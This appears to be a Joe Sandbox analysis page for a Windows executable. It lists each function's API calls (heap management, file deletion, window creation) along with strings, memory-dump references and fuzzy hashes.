HeapReAlloc.KERNEL32 ref: 0000000140012293

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AllocHeap$Value
String ID:
API String ID: 3898337583-0
Opcode ID: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
Instruction ID: c44eb9ef2cf98d3488e4d96c7e244cbf8e5b64558ad0ce04898d2a75112beb9a
Opcode Fuzzy Hash: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
Instruction Fuzzy Hash: 1521A336609B40C6DA25CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeProcess.KERNEL32 ref: 0000000140002ADD

Strings

open, xrefs: 0000000140002A68, 0000000140002A75

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CodeExitProcess
String ID: open
API String ID: 3861947596-2758837156
Opcode ID: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
Instruction ID: 9a8e33d82e51c75021cc1a1bc422673ad63e4121514530fd256563005765fdb1
Opcode Fuzzy Hash: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
Instruction Fuzzy Hash: 6C315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

Function 0000000140001000 Relevance: 3.1, APIs: 2, Instructions: 112
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B

Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E

Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569

Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123

Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2

Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1

Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491

Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6

Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194

Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266

HeapDestroy.KERNEL32 ref: 000000014000124C
ExitProcess.KERNEL32 ref: 0000000140001258

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
String ID:
API String ID: 1207063833-0
Opcode ID: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
Instruction ID: f14933b67cb23f8d7438bd3232522d16ce9264245af44939dd0cca49c0d9e1bd
Opcode Fuzzy Hash: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
Instruction Fuzzy Hash: 7A5108F0A11A4481FA03F7A3F8527E926159B9D7D4F808129BF1D1B3F3DD3A85598B22

Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8

RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8

Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187

Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
String ID:
API String ID: 547990026-0
Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610

Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: ExceptionHandlerVectored$Remove
String ID:
API String ID: 3670940754-0
Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32 ref: 000000014000DA8C
DeleteFileW.KERNEL32 ref: 000000014000DA95

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222

Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 000000014001206E
TlsAlloc.KERNEL32 ref: 000000014001207B

Part of subcall function 0000000140012C50: HeapAlloc.KERNEL32 ref: 0000000140012C63
Part of subcall function 0000000140012C50: HeapAlloc.KERNEL32 ref: 0000000140012C7D
Part of subcall function 0000000140012C50: TlsSetValue.KERNEL32 ref: 0000000140012CB0

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
Instruction ID: 1c20f48a7e0d63c5f07c3edeff385a7070e23dcbb2ee76a36a736f2f2e91a8b3
Opcode Fuzzy Hash: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
Instruction Fuzzy Hash: F9D0C939A1175092E746AB72A81A3E922A0F75C3C1F901419B70947771DF7E81965A40

Function 00000001400120A0 Relevance: 3.0, APIs: 2, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNEL32 ref: 00000001400120AB
TlsFree.KERNEL32 ref: 00000001400120B7

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: DestroyFreeHeap
String ID:
API String ID: 3293292866-0
Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700

Function 0000000140011D30 Relevance: 2.6, APIs: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140011EF4: HeapFree.KERNEL32 ref: 0000000140011F4D

HeapAlloc.KERNEL32 ref: 0000000140011D82
memset.MSVCRT ref: 0000000140011DB6

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Heap$AllocFreememset
String ID:
API String ID: 3063399779-0
Opcode ID: a0cc480958914a5b96af09c049cabf50404750236a51b526bc810001df406aed
Instruction ID: a75182db50c1f984f89b78753495ac0ab196a1c9ad642d63c8067afd0bb8a22e
Opcode Fuzzy Hash: a0cc480958914a5b96af09c049cabf50404750236a51b526bc810001df406aed
Instruction Fuzzy Hash: 12213B32605B5086EA1ADB53BC4179AA6A8F7C8FD0F498025AF584BB66DE79C852C340

Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000DD88
CloseHandle.KERNEL32 ref: 000000014000DD91

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740

Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000000014000DDED

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10

Function 0000000140010FFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32 ref: 0000000140011019

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15

Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32 ref: 000000014000DC91

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530

Function 000000014000C980 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 000000014000C98E

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00

Function 000000014000C6B0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C6C0

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: ExceptionHandlerRemoveVectored
String ID:
API String ID: 1340492425-0
Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780

Non-executed Functions

Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000B5D8: wcslen.MSVCRT ref: 000000014000B5EA
Part of subcall function 000000014000B5D8: HeapAlloc.KERNEL32 ref: 000000014000B600

GetStockObject.GDI32 ref: 000000014000B7B6
LoadIconW.USER32 ref: 000000014000B7F2
LoadCursorW.USER32 ref: 000000014000B803
RegisterClassExW.USER32 ref: 000000014000B82D
IsWindowEnabled.USER32 ref: 000000014000B859
EnableWindow.USER32 ref: 000000014000B86C
GetSystemMetrics.USER32 ref: 000000014000B88B
GetSystemMetrics.USER32 ref: 000000014000B89B
CreateWindowExW.USER32 ref: 000000014000B8F0
SetWindowLongPtrW.USER32 ref: 000000014000B90E
CreateWindowExW.USER32 ref: 000000014000B95E
SendMessageW.USER32 ref: 000000014000B97C
CreateWindowExW.USER32 ref: 000000014000B9D9
SendMessageW.USER32 ref: 000000014000B9FA
SetFocus.USER32 ref: 000000014000BA07
SendMessageW.USER32 ref: 000000014000BA22
wcslen.MSVCRT ref: 000000014000BA2B
wcslen.MSVCRT ref: 000000014000BA36
SendMessageW.USER32 ref: 000000014000BA4D
CreateWindowExW.USER32 ref: 000000014000BAA9
SendMessageW.USER32 ref: 000000014000BAC8
CreateAcceleratorTableW.USER32 ref: 000000014000BAED
SetForegroundWindow.USER32 ref: 000000014000BAF9
BringWindowToTop.USER32 ref: 000000014000BB02
GetMessageW.USER32 ref: 000000014000BB16
TranslateAcceleratorW.USER32 ref: 000000014000BB2A
TranslateMessage.USER32 ref: 000000014000BB38
DispatchMessageW.USER32 ref: 000000014000BB42
DestroyAcceleratorTable.USER32 ref: 000000014000BB59
wcslen.MSVCRT ref: 000000014000BB68
wcscpy.MSVCRT ref: 000000014000BB7E
HeapFree.KERNEL32 ref: 000000014000BB90
HeapFree.KERNEL32 ref: 000000014000BBB5
HeapFree.KERNEL32 ref: 000000014000BBCC
HeapFree.KERNEL32 ref: 000000014000BBE3

Strings

EDIT, xrefs: 000000014000B9BF
C, xrefs: 000000014000BA99
n, xrefs: 000000014000BAA1
STATIC, xrefs: 000000014000B944
P, xrefs: 000000014000BA7B
BUTTON, xrefs: 000000014000BA8A

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
String ID: BUTTON$C$EDIT$P$STATIC$n
API String ID: 9748049-1690119102
Opcode ID: 3672b20c3f93e9cafd23a15c04167ab05239bdad4ad45a7c7ed3e5f5fd201a6e
Instruction ID: 503d67efbf07ff6f248b06a67c50be69490569a40db1ce31eb7df8f18fb995d6
Opcode Fuzzy Hash: 3672b20c3f93e9cafd23a15c04167ab05239bdad4ad45a7c7ed3e5f5fd201a6e
Instruction Fuzzy Hash: 59D134B5605B4086EB12DB62F8447AA77A5FB8CBC8F404129AF4A47B79DF7DC4498B00

Function 00000001400138E5 Relevance: 12.0, Strings: 9, Instructions: 745COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 000000014001428E
invalid code lengths set, xrefs: 0000000140013A63
invalid literal/length code, xrefs: 0000000140013FF6
invalid literal/lengths set, xrefs: 0000000140013D60
invalid code -- missing end-of-block, xrefs: 0000000140013CE3
invalid distances set, xrefs: 0000000140013DCC
too many length or distance symbols, xrefs: 0000000140013A7B
invalid distance code, xrefs: 00000001400141DA
invalid bit length repeat, xrefs: 0000000140013CFB

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
Instruction ID: 63a129330255db97eb1aabb126bfc5b4551e8f686405ea2d62c327762663274b
Opcode Fuzzy Hash: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
Instruction Fuzzy Hash: FB620572A106A48BE799CF25D498BED3BF9F748780F518129FB468B7A0E739C845C740

Function 0000000140013175 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 399COMMON

Download Yara Rule

Strings

, xrefs: 000000014001324B
header crc mismatch, xrefs: 00000001400135F1
unknown compression method, xrefs: 00000001400130C8
unknown header flags set, xrefs: 00000001400131B7

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

